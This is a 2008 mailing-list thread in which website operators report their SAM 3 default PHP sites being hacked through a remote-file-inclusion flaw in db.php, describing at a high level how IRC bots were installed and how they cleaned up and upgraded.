update has been available for a few months now my host manager already did a php upgrade to my sever and to his entire network
----- Original Message ----- From: Greg Stafford To: [email protected] Sent: Wednesday, January 09, 2008 3:51 PM Subject: RE: [General-discussion] PHP Website Vulnerability. My site was hacked as well, but I use a webhost (1and1.com). I will remove the files until an update is available. Thanks, Greg http://www.progpalaceradio.com http://www.myspace.com/progpalaceradio -----Original Message----- From: Roy Pait <[email protected]> Sent: Wednesday, January 09, 2008 3:39 PM To: [email protected] Subject: Re: [General-discussion] PHP Website Vulnerability. Just so everyone knows, this is not a theoretical vuln. My server was hacked 5 days ago (fortunately minimally) and a couple of eggdrop (IRC relay) programs installed along with some extraneous PHP files (baca.php). It was fairly easily detected and cleaned up, but I tracked it back to db.php which was being used. I renamed the file (which of course stopped the web site) and then cleaned up. The basic premise is that the common setting is passed a url of a site with a php text file. This file is parsed and run on the local system, displays a web page (in php) with a command line area. From there it's a simple matter of issuing ftp requests and installing web (php or perl) apps. User has access at the level that the web server is running at. This was a slightly modified version of the SAM 3 default site, so the exploit's been there for a while, but is now known and hackers are actively looking for it. Google is real helpful in that respect based on the referrer listing just before the hack. Fortunately my firewall blocked most of what they were trying to do (IRC bot relay and spam generation triggered by the bot as I disallow IRC from all machines and SMTP is only available from the main server) Roy Pait >>> "James Henline" <[email protected]> 1/9/2008 9:36 AM >>> Please see the following news article for more information. http://www.spacialaudio.com/news/index.html?newsID=151 _______________________________________________ General-discussion mailing list [email protected] http://mailman.spacialaudio.com/mailman/listinfo/general-discussion TO unsubscribe to this list, simply send a blank email to [email protected] with the subject 'unsubscribe' _______________________________________________ General-discussion mailing list [email protected] http://mailman.spacialaudio.com/mailman/listinfo/general-discussion TO unsubscribe to this list, simply send a blank email to [email protected] with the subject 'unsubscribe'
